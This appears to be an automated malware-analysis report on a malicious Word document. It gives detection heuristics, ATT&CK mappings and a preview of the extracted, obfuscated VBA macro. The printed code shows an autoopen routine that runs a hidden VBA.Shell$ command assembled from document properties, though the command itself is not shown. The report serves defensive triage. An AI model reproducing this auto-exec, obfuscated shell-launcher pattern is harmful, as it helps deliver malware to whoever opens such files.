MALICIOUS
172
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious OLE document containing a legacy WordBasic autoopen macro. The presence of OLE_VBA_SHELL and CLAMAV_DETECTION heuristics, along with the 'Doc.Macro.DollarShell' ClamAV signature, strongly suggests that the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions.
Heuristics 7
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
ySAkVsagK = 3012 + 907 / 2725 / 6634 / 4887 - 1498 - 4304 + 3817 + 5722 VBA.Shell$ xVYCtussSck + zZRULKRPYM + hnVxSSKxF + TZkMpdmk + UastfATh + YMPKzdM + DfYkVCgV + eXmPEanPE + dcVwWpdS + PHUHvCuTDV + LubprFx + ZSSeAkt + dfwpkaG + BVKZKkNb + ZvFFcuPA + NaKtpMrM + smmEANd + SsHTmFHpD, 0 End Function -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "Module1" Sub autoopen() RZwZYPM -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11672 bytes |
SHA-256: 319123e9baf03c9d8af2ec2707b73e5682ce5099c0f3c07b4cbbc4b4881513b0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
220 of 267 identifiers look randomly generated (e.g. 'KbzdzhnNBZy') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
RZwZYPM
End Sub
Function kNCwPPkFd()
Dim GutFDFNybds(8089)
GutFDFNybds(6809) = 4589 + 1558 + 9452 + 314 / 9108 - 6266 - 5810 + 1955 + 8037 + 3406
GutFDFNybds(5117) = 5332 + 2554 / 752 - 2938 - 4055 - 8779 + 3274 + 9423
GutFDFNybds(4342) = sHVnYaZuR
GutFDFNybds(2382) = UfNMzVwuM
GutFDFNybds(557) = xLdSpLf
GutFDFNybds(629) = vTTKYGKmuv
GutFDFNybds(2795) = CrmBcuvWC
GutFDFNybds(2405) = exEBCkAL
GutFDFNybds(4451) = pgGHFPYZdy
GutFDFNybds(2122) = gVxXHMhTM
GutFDFNybds(5029) = nTMxXxtDL
GutFDFNybds(3250) = cKcpvXG
GutFDFNybds(3999) = FxMPYCNRWe
End Function
Function gkCetzrWsg()
Dim zvDNUZB(1233)
zvDNUZB(595) = 1250 + 7842 + 986 + 4530 / 4970 / 9908 - 7757 - 3381 - 2163 + 4944
zvDNUZB(975) = tRsMZML
zvDNUZB(572) = TDYFhcgKE
zvDNUZB(709) = bMxWLzh
zvDNUZB(262) = vZVpxwdDxev
zvDNUZB(228) = XwwERktFf
zvDNUZB(81) = FttyLXGgdKD
zvDNUZB(332) = MkdhmBUTY
zvDNUZB(684) = vSCCfPHfr
zvDNUZB(806) = WXpAhFrxnd
zvDNUZB(975) = PtHxpePczMs
zvDNUZB(301) = CDLgXUKry
zvDNUZB(182) = UXMuYDaW
zvDNUZB(184) = BpCsfEcnZ
zvDNUZB(158) = DfktxzuL
zvDNUZB(303) = SvVSrGyauu
zvDNUZB(489) = MfmLRttRGDk
zvDNUZB(180) = fgFFvVrze
zvDNUZB(576) = EMZSGKM
zvDNUZB(535) = gACHwUa
zvDNUZB(761) = SHpTxZGK
zvDNUZB(644) = KbzdzhnNBZy
zvDNUZB(1105) = XfyPudbBNNM
End Function
Function hzvmYnYUkw()
Dim yyPnEeM(6298)
yyPnEeM(4531) = 1341 + 2750 + 173 + 3719 / 9165 / 2484 / 9892 - 2361 + 9574 + 6019
yyPnEeM(456) = 8690 + 3942 + 2354 + 1958 / 1337 - 6160 + 2528 + 5271 + 4760
yyPnEeM(2204) = 1384 + 4612 + 9186 + 9240 / 2710 / 4006 - 3565 + 7032
yyPnEeM(3336) = ynLcTsuK
yyPnEeM(1822) = kuugbMCnpa
yyPnEeM(1442) = gDPKYpefhfx
yyPnEeM(2591) = uXAXDsZDDBn
yyPnEeM(2934) = LUrwbKrVfF
yyPnEeM(2858) = dpeycnMTM
yyPnEeM(2780) = dRzuUFD
yyPnEeM(1901) = eGYpXwg
yyPnEeM(2508) = DyDFpzM
yyPnEeM(4870) = VhAUkzxha
yyPnEeM(135) = FyUaYZS
yyPnEeM(1148) = YyMmyhecM
yyPnEeM(2157) = YYzMytSzB
yyPnEeM(5411) = WApKTcg
yyPnEeM(2093) = PDwYmkgPCer
yyPnEeM(2462) = AhpxSZeNwZs
yyPnEeM(3939) = HrNECVA
yyPnEeM(1683) = rZPUdnYssP
yyPnEeM(509) = dtnWNFbSr
yyPnEeM(4444) = BfxMzwg
yyPnEeM(5914) = mprHLXwTCyc
yyPnEeM(4473) = bbcKDBxKh
yyPnEeM(4062) = eZPPGHpFB
yyPnEeM(1949) = ueRzgKEk
yyPnEeM(2535) = vVwXdDwuVp
yyPnEeM(923) = TAMTGzRPa
End Function
Function KkKDUAzcSw()
Dim ngeCtBrdPp(5921)
ngeCtBrdPp(1921) = 6442 + 3737 + 4511 + 458 / 6750 / 6084 / 2051 - 7772 - 9783 + 4888
ngeCtBrdPp(3344) = 4180 + 4804 + 628 / 4315 / 7064 / 7425 - 5411 + 3106 + 3633
ngeCtBrdPp(3515) = 4628 + 5814 + 8777 / 960 / 7435 - 9440 + 5848 + 5007 + 3155
ngeCtBrdPp(5548) = DzwvmaYBu
ngeCtBrdPp(5615) = btDwYCHU
ngeCtBrdPp(4139) = NzbytHV
ngeCtBrdPp(3241) = swrDKwrtL
ngeCtBrdPp(3078) = VXpHRpU
ngeCtBrdPp(2615) = pKprMaSe
ngeCtBrdPp(954) = WYBvzXcc
ngeCtBrdPp(919) = vFtVCczS
ngeCtBrdPp(2432) = UwrbAZtUSE
ngeCtBrdPp(1307) = ptawGGZTeyk
ngeCtBrdPp(3512) = TemDwAh
ngeCtBrdPp(2411) = KTfLESnWhY
ngeCtBrdPp(5264) = szwrFKdBE
ngeCtBrdPp(4510) = ryrTWZFNuz
ngeCtBrdPp(1609) = TMGMsmaMGa
ngeCtBrdPp(4054) = zkTrhfwxp
ngeCtBrdPp(4184) = EsEULEhrG
ngeCtBrdPp(5510) = hYbMcXxZKfX
ngeCtBrdPp(767) = fnsRHMvnRBa
ngeCtBrdPp(4645) = kHtsCWm
ngeCtBrdPp(99) = xvwrLRvVT
ngeCtBrdPp(1167) = dNcmgHngS
ngeCtBrdPp(5840) = wTUfXsam
ngeCtBrdPp(5655) = dBuxdDDYf
End Function
Function ZtBSGbLzXHa()
Dim XgnefYfX(9516)
XgnefYfX(1806) = 4020 + 3310 + 5251 + 793 / 1338 / 1485 / 6297 - 8729 - 7367 + 7712
XgnefYfX(6509) = 4789 + 9467 / 7692 / 2109 - 5593 - 7409 + 264 + 1815 + 9196
XgnefYfX(5975) = XUMzkLWpc
XgnefYfX(3632) = nAsuaDm
XgnefYfX(9384) = fDUkuEeFbTC
XgnefYfX(1556) = ZESzdUFxPnt
XgnefYfX(6100) = abnKyfSyc
XgnefYfX(7632) = LuCUcUywe
XgnefYfX(8951) = WHHZMWg
XgnefYfX(2840) = DLuBxeAsWC
XgnefYfX(8562) = EUvAtdDTh
XgnefYfX(2609) = nDBvYuep
XgnefYfX(9057) = sTaUYfCYCn
End Function
Function MTHskWBW()
Dim xnPMrbMtZS(336)
xnPMrbMtZS(133) = 4403 + 7978 + 475 + 8350 / 7523 / 426 - 1070 - 9824 + 4087 + 173 + 1536
xnPMrbMtZS(68) = 3832 + 3933 + 8495 + 4938 / 8767 / 7035 - 9467 + 1284 + 2041
xnPMrbMtZS(211) = cPAmfXkeAUm
xnPMrbMtZS(178) = XGehLFZg
xnPMrbMtZS(307) = MfuKnvfbFu
xnPMrbMtZS(260) = RzmDmeSUV
xnPMrbMtZS(266) = YEKbWwrfYe
xnPMrbMtZS(84) = nwMhypXGRb
xnPMrbMtZS(103) = tKxSmEFG
xnPMrbMtZS(311) = SvNfLYnp
xnPMrbMtZS(136) = rxsUDwH
xnPMrbMtZS(263) = AeuLPcBYag
xnPMrbMtZS(309) = MnWGYYS
xnPMrbMtZS(80) = ssfynVnF
xnPMrbMtZS(259) = ZnpgaHwyyVV
xnPMrbMtZS(274) = sPnrsYRYeX
xnPMrbMtZS(98) = cSWUvnG
End Function
Function BLsENXpGYz()
Dim UDDFMwKCa(7639)
UDDFMwKCa(5494) = 5811 + 8696 + 5284 / 1171 / 3578 - 9651 - 9810 + 6196 + 6645 + 2315
UDDFMwKCa(407) = 5673 + 5808 + 7830 + 2067 / 1770 - 9916 - 9128 - 6481 + 7114 + 3915 + 7022
UDDFMwKCa(4803) = EBbBnutgUS
UDDFMwKCa(265) = LAKDNNS
UDDFMwKCa(1108) = xDLFBALR
UDDFMwKCa(2633) = xgvWTUuxm
UDDFMwKCa(4807) = XAPmBFDx
UDDFMwKCa(2529) = LEYxeHhTg
UDDFMwKCa(2693) = CHWRpSPAL
UDDFMwKCa(205) = grDCMUVv
UDDFMwKCa(964) = MPSafGX
UDDFMwKCa(5626) = HgSdfAkKRyP
UDDFMwKCa(4825) = GLBbEKe
UDDFMwKCa(6645) = AMNEWKWE
UDDFMwKCa(4661) = xaFhWSzWn
UDDFMwKCa(113) = vHeHzLhSYA
UDDFMwKCa(6490) = gBWMbWzg
UDDFMwKCa(5854) = NeLKAhfupt
End Function
Public Function gNEhuVVG(GgdkCDDb)
UsLwcMzS = 2720 + 6362 / 2732 - 9969 + 9135 + 8750
VcrbvDDWhD = 1071 + 890 + 4393 + 2362 / 5778 / 7113 / 3373 - 7544 - 5488 + 9987 + 9730
caPYGWtx = 2169 + 3714 + 9995 / 1222 - 3013 - 5124 + 1642 + 6967
eEfWWnHvt = 3006 + 9888 / 6157 / 2761 - 4914 - 1069 + 5829
FnUCPYtvUr = 5387 + 4148 + 7289 / 7655 / 2024 / 4064 - 6531 + 6164
LVKkwnTKC = 9748 + 2258 / 7529 - 6294 - 1962 - 730 + 4107
UEcsuXxsEe = 765 + 2950 + 7644 / 1679 / 8212 / 5946 - 330 + 3244 + 8358
kGTxEdrncg = 3393 + 6639 + 9406 + 8283 / 1243 - 7955 + 3563 + 4760 + 7055
mFhRRStVGt = 4084 + 7375 + 1878 / 2589 - 5813 - 9849 + 9502 + 9843
NyXcevBTz = 1046 + 2685 + 2825 / 7033 / 1632 - 7047 - 5979 + 9244 + 8043
kaZwESKG = 9296 + 1100 + 2953 / 582 - 8317 - 6326 + 9500
gNEhuVVG = ActiveDocument.CustomDocumentProperties(GgdkCDDb)
End Function
Public Function xVYCtussSck()
FdrPEFmRY = 7577 + 1388 + 6678 + 694 / 8569 - 6961 - 3582 + 6068 + 5246
KxdyNfcbufL = 4593 + 1340 + 4456 / 4156 - 6970 - 9481 - 4427 + 9917 + 7370
TnNYzPu = 6027 + 3622 + 6280 + 1144 / 5230 - 6723 - 8422 + 4880 + 6647
YrwkRPynR = gNEhuVVG("wUyBNMXXeb") + gNEhuVVG("CEVbEvaaSxA") + gNEhuVVG("SLMzLZwYFb") + gNEhuVVG("EagfrcnK")
wSgmnSWBGS = 3774 + 6509 + 5301 + 3446 / 5725 - 6007 + 4369
HCYRKCGbg = gNEhuVVG("WdEXBybd") + gNEhuVVG("hGLMamrsKsx") + zZRULKRPYM + hnVxSSKxF + TZkMpdmk + UastfATh + YMPKzdM + DfYkVCgV + eXmPEanPE + dcVwWpdS + PHUHvCuTDV + LubprFx + ZSSeAkt + dfwpkaG + BVKZKkNb + ZvFFcuPA + NaKtpMrM + smmEANd + gNEhuVVG("ngzSyeYZsH") + gNEhuVVG("FRHxtHzmFVk") + gNEhuVVG("NXVHDLytKPH")
XVpGkTXnbXd = 1016 + 2593 + 3049 + 8251 / 7969 / 9052 / 1619 - 7608 - 9490 - 2226 + 603 + 3941 + 5260
VTwEbWZE = 5800 + 1476 + 4406 / 1069 / 7479 - 2765 - 9704 - 4862 + 6526 + 4739
XxAVxCWuT = HCYRKCGbg + YrwkRPynR
FXBArySBHWg = 6161 + 267 + 7245 + 2436 / 7994 - 5224 - 5154 - 63 + 5898 + 8391
EmMCKCCf = 2507 + 3207 + 9751 / 1900 - 3882 - 2053 + 5186 + 9995 + 4363
gZfTwLEL = 9487 + 4393 + 2482 / 8393 - 6254 + 4560 + 2183
DUFTSFYaz = 5364 + 6191 + 4414 + 3899 / 6857 / 2808 - 6660 + 769
xdHFCBbSEG = 3103 + 3953 + 5118 + 6288 / 151 - 8717 - 8239 + 3849
rUPSpfWD = 8447 + 9087 / 1948 / 4728 - 7672 + 1149 + 4722
vaVAnKvg = 9819 + 9581 + 3966 + 2623 / 7703 / 830 / 7653 - 6710 + 8149 + 256
EvFsFNyTfG = 6270 + 8902 / 9529 / 6963 / 2750 - 8105 - 9410 + 593
xVYCtussSck = XxAVxCWuT + ActiveDocument.BuiltInDocumentProperties("Comments") + zZRULKRPYM + hnVxSSKxF + TZkMpdmk + UastfATh + YMPKzdM + DfYkVCgV + eXmPEanPE + dcVwWpdS + PHUHvCuTDV + LubprFx + ZSSeAkt + dfwpkaG + BVKZKkNb + ZvFFcuPA + NaKtpMrM + smmEANd + kFwhrwceuA
End Function
Public Function aRaXSfYg()
SrUyracfwUA = 7256 + 1314 + 6979 / 5179 - 6445 - 4207 - 8311 + 114 + 3570
xMSEGUgRz = 715 + 7841 / 3452 - 8501 - 6759 - 3056 + 1365 + 5245
aRaXSfYg = gNEhuVVG("RGCLPXKZS") + gNEhuVVG("FLgywRpZMuW") + gNEhuVVG("cxpnaDB")
End Function
Public Function RZwZYPM()
LZKtrygzwtk = 1755 + 6462 + 7565 / 887 / 3135 - 1681 + 4876 + 1591 + 3904
ewYvkvkS = 5174 + 6200 + 5951 + 4261 / 8384 - 2998 + 2524
ySAkVsagK = 3012 + 907 / 2725 / 6634 / 4887 - 1498 - 4304 + 3817 + 5722
VBA.Shell$ xVYCtussSck + zZRULKRPYM + hnVxSSKxF + TZkMpdmk + UastfATh + YMPKzdM + DfYkVCgV + eXmPEanPE + dcVwWpdS + PHUHvCuTDV + LubprFx + ZSSeAkt + dfwpkaG + BVKZKkNb + ZvFFcuPA + NaKtpMrM + smmEANd + SsHTmFHpD, 0
End Function
Function hcbHdZsNd()
Dim URbRRmB(7188)
URbRRmB(6126) = 5055 + 9127 + 5006 + 9838 / 5370 / 5119 - 9603 + 6664 + 2288 + 8624
URbRRmB(3229) = 1532 + 743 + 5929 / 7694 - 7636 - 7408 + 4299 + 5770 + 6787
URbRRmB(6963) = ehLeeYNmmtp
URbRRmB(4043) = TmgknXuXEge
URbRRmB(3450) = XrucZkwsG
URbRRmB(3450) = wxVdkAcM
End Function
Function byxKrsP()
Dim TuVugTBm(7029)
TuVugTBm(2334) = 2854 + 4638 / 6949 / 9004 - 8133 - 533 + 9144
TuVugTBm(2750) = 2210 + 2636 / 737 / 4872 / 4952 - 664 - 973 - 7517 + 762 + 8276
TuVugTBm(1904) = 123 + 2187 / 894 / 7937 / 7440 - 8845 - 9684 + 511
TuVugTBm(5763) = NsUnxWWP
TuVugTBm(2286) = cFRzePKFE
TuVugTBm(3452) = TuYRWHspyv
TuVugTBm(5564) = mWTapcP
End Function
Function uhsKeELBWdw()
Dim yCGkvAkNau(8656)
yCGkvAkNau(5544) = 5092 + 4682 / 2656 / 7695 - 7626 + 6820
yCGkvAkNau(1349) = 7166 + 3911 / 1238 / 1993 / 9922 - 9681 - 9220 - 1899 + 5644
yCGkvAkNau(2178) = ZMrzFSc
yCGkvAkNau(1694) = WTYYMAP
End Function
Function vXehZBbbC()
Dim HneKkETtN(7102)
HneKkETtN(2853) = 474 + 5904 + 9986 / 3660 / 2283 / 5792 - 8237 + 2671
HneKkETtN(3555) = 554 + 7790 + 9944 / 6878 - 1352 + 4792 + 8776 + 7263
HneKkETtN(7046) = 2103 + 61 / 9900 - 1738 - 3868 - 2540 + 2885
HneKkETtN(4464) = YssFpBMD
HneKkETtN(3772) = aRYDxANAx
HneKkETtN(4129) = gBGtFCWF
HneKkETtN(1011) = CMUnhYhgF
End Function
Function zCYDVTa()
Dim KHNKTbtxL(4701)
KHNKTbtxL(3786) = 8615 + 4832 + 8437 / 1464 / 2395 / 303 - 3739 + 8697 + 4831
KHNKTbtxL(1102) = 865 + 5430 / 7707 / 8879 / 2877 - 5984 - 5452 + 2945 + 8147 + 384
KHNKTbtxL(2907) = 4536 + 9128 + 5917 + 1260 / 6081 - 9327 + 8976 + 3155 + 780
KHNKTbtxL(2696) = DgTNhVS
KHNKTbtxL(1136) = LtcRUcwLYa
KHNKTbtxL(174) = ektWRtdvv
KHNKTbtxL(2919) = CarmsKt
End Function
Function LVVccAfV()
Dim suMsDtDbn(5913)
suMsDtDbn(4587) = 8135 + 2404 + 9218 / 1351 / 2661 / 8814 - 4307 - 8060 - 7059 + 8666 + 1424 + 1148
suMsDtDbn(5433) = 7504 + 7477 + 5421 / 131 / 7685 / 9264 - 4351 - 1177 - 2544 + 2530 + 7718 + 2828
suMsDtDbn(5679) = 6449 + 5223 / 2370 / 1922 - 6517 - 6494 + 526 + 5663 + 4948
suMsDtDbn(603) = TXbwczkfuG
suMsDtDbn(826) = RBaMktLzZn
suMsDtDbn(1030) = ktTaHbmhUNH
suMsDtDbn(4809) = BNbhRfS
End Function
Function NvKzRMyx()
Dim RhFvhWYh(1174)
RhFvhWYh(338) = 1001 + 4973 + 1658 / 1649 / 9412 - 5265 - 3843 - 6602 + 4711 + 8845
RhFvhWYh(849) = 9743 + 3461 + 2269 / 8616 / 3963 - 8304 - 1059 + 5153 + 3893
RhFvhWYh(1016) = 4112 + 6455 / 1215 / 3667 / 9229 - 5497 + 5001 + 2548 + 1493
RhFvhWYh(1053) = bbvpwbbpp
RhFvhWYh(1083) = eTLZxhhUs
RhFvhWYh(445) = VWCLwHa
RhFvhWYh(996) = VvYPdvMgSkk
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.